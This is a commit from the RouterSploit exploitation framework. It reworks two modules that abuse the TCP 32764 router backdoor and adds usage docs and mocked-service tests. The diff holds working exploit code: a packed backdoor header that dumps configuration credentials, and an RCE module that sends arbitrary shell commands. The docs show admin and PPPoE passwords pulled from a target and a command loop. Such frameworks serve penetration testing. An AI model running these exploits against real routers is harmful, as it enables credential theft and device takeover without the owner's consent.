Unverified Commit 72f5b2fb by Marcin Bury Committed by GitHub

Fixing TCP-32764 modules, adding tests and docs (#447)

parent 1ab8e5f8
## Description
Module exploits backdoor functionality that allows fetching credentials for administrator user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use exploits/routers/multi/tcp_32764_info_disclosure`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If device is vulnerable administrative credentials are returned.
## Scenarios
```
rsf > use exploits/routers/multi/tcp_32764_info_disclosure
rsf (TCP-32764 Info Disclosure) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TCP-32764 Info Disclosure) > run
[*] Running module...
[+] Target is vulnerable
[*] Connection established
Parameter Value
--------- -----
http_username admin
http_password admin
pppoe_username username
pppoe_password 1234567890
pppoa_username Guest
log_login 0
```
## Description
Module exploits backdoor functionality that allows executing commands on operating system level.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use exploits/routers/multi/tcp_32764_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If device is vulnerable it is possible to execute commands on operating system level.
## Scenarios
```
rsf > use exploits/routers/multi/tcp_32764_rce
rsf (TCP-32764 RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TCP-32764 RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > echo test
[*] Executing 'echo test' on the device...
[*] Connection established
test
cmd >
```
......@@ -53,8 +53,7 @@ class Exploit(TCPClient):
if self.check():
print_success("Target is vulnerable")
tcp_client = self.tcp_connect()
conf = self.execute(tcp_client, 1)
conf = self.get_config()
lines = re.split("\x00|\x01", conf)
pattern = re.compile('user(name)?|password|login')
......@@ -67,71 +66,50 @@ class Exploit(TCPClient):
if len(value) > 0 and pattern.search(var):
credentials.append((var, value))
except ValueError:
pass
continue
if len(credentials):
if credentials:
print_table(("Parameter", "Value"), *credentials)
else:
print_error("Target is not vulnerable")
def execute(self, tcp_client, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
self.tcp_send(tcp_client, header + payload + "\x00")
r = self.tcp_recv(tcp_client, 0xC)
def get_config(self):
# 0x53634D4D - backdoor code
# 0x01 - 1 - get config
headers = struct.pack(self.endianness + "III", 0x53634D4D, 0x01, 0x01)
payload = headers + b"\x00"
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
tcp_client = self.tcp_connect()
if tcp_client:
self.tcp_send(tcp_client, payload)
response = self.tcp_recv(tcp_client, 0xC)
sig, ret_val, ret_len = struct.unpack(self.endianness + 'III', r)
if response:
sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
response = self.tcp_recv(tcp_client, ret_len)
if ret_val != 0:
return ""
self.tcp_close(tcp_client)
ret_str = ""
while len(ret_str) < ret_len:
tmp = self.tcp_recv(tcp_client, ret_len - len(ret_str))
ret_str += tmp
if response:
return str(response, "utf-8")
return ret_str
return ""
@mute
def check(self):
return False
tcp_client = self.tcp_connect()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
if tcp_client:
self.tcp_send(tcp_client, b"ABCDE")
response = self.tcp_recv(tcp_client, 5)
self.tcp_close(tcp_client)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
if response:
if response.startswith(b"MMcS"):
self.endianness = ">" # BE
elif response.startswith(b"ScMM"):
self.endinaness = "<" # LE
s.send(utils.random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((self.target, 32764))
conf = self.execute(s, 1)
s.close()
lines = re.split("\x00|\x01", conf)
if len(lines):
return True # target is vulnerable
return True # target is vulnerable
return False # target is not vulnerable
......@@ -52,82 +52,49 @@ class Exploit(TCPClient):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
shell(self)
else:
print_error("Target is not vulnerable")
def command_loop(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((self.target, 32764))
def execute(self, cmd):
cmd = bytes(cmd, "utf-8")
while True:
cmd = input("cmd > ")
# 0x53634d4d - backdoor code
# 0x07 - exec command
# length - length of the command to execute
header = struct.pack(self.endianness + "III", 0x53634D4D, 0x07, len(cmd) + 1)
payload = header + cmd + b"\x00"
if cmd in ['quit', 'exit']:
s.close()
return
tcp_client = self.tcp_connect()
if tcp_client:
self.tcp_send(tcp_client, payload)
response = self.tcp_recv(tcp_client, 0xC)
print_info(self.execute(s, 7, cmd.strip("\n")))
sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
response = self.tcp_recv(tcp_client, ret_len)
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
self.tcp_close(tcp_client)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
if response:
return str(response, "utf-8")
sig, ret_val, ret_len = struct.unpack(self.endianness + 'III', r)
if ret_val != 0:
return ""
ret_str = ""
while len(ret_str) < ret_len:
tmp = s.recv(ret_len - len(ret_str))
ret_str += tmp
return ret_str
return ""
@mute
def check(self):
return False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
s.send(utils.random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
tcp_client = self.tcp_connect()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((self.target, 32764))
if tcp_client:
self.tcp_send(tcp_client, b"ABCDE")
response = self.tcp_recv(tcp_client, 5)
self.tcp_close(tcp_client)
mark = utils.random_text(32)
cmd = 'echo "{}"'.format(mark)
response = self.execute(s, 7, cmd)
s.close()
if response:
if response.startswith(b"MMcS"):
self.endianness = ">" # BE
elif response.startswith(b"ScMM"):
self.endianness = "<" # LE
if mark in response:
return True # target is vulnerable
return True # target is vulnerable
return False # target is not vulnerable
......@@ -4,6 +4,7 @@ from threat9_test_bed.scenarios import HttpScenario
from threat9_test_bed.service_mocks import HttpScenarioService, HttpServiceMock
from threat9_test_bed.scenarios import TelnetScenario
from threat9_test_bed.service_mocks.telnet_service_mock import TelnetServiceMock
from threat9_test_bed.service_mocks.tcp_service_mock import TCPServiceMock
@pytest.fixture
......@@ -58,3 +59,9 @@ def timeout_target():
def generic_target():
with TelnetServiceMock("127.0.0.1", 0, TelnetScenario.AUTHORIZED) as telnet_service:
yield telnet_service
@pytest.fixture
def tcp_target():
with TCPServiceMock("127.0.0.1", 0) as tcp_service:
yield tcp_service
from routersploit.modules.exploits.routers.multi.tcp_32764_info_disclosure import Exploit
def test_check_success1(tcp_target):
""" Test scenario - successful check Big Endian"""
command_mock = tcp_target.get_command_mock(b"ABCDE")
command_mock.return_value = b"MMcS"
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
assert exploit.run() is None
def test_check_success2(tcp_target):
""" Test scenario - successful check - Little Endian"""
command_mock = tcp_target.get_command_mock(b"ABCDE")
command_mock.return_value = b"ScMM"
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
assert exploit.run() is None
from unittest import mock
from routersploit.modules.exploits.routers.multi.tcp_32764_rce import Exploit
@mock.patch("routersploit.modules.exploits.routers.multi.tcp_32764_rce.shell")
def test_check_success1(mocked_shell, tcp_target):
""" Test scenario - successful check Big Endian"""
command_mock = tcp_target.get_command_mock(b"ABCDE")
command_mock.return_value = b"MMcS"
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
assert exploit.run() is None
@mock.patch("routersploit.modules.exploits.routers.multi.tcp_32764_rce.shell")
def test_check_success2(mocked_shell, tcp_target):
""" Test scenario - successful check - Little Endian"""
command_mock = tcp_target.get_command_mock(b"ABCDE")
command_mock.return_value = b"ScMM"
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
assert exploit.run() is None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment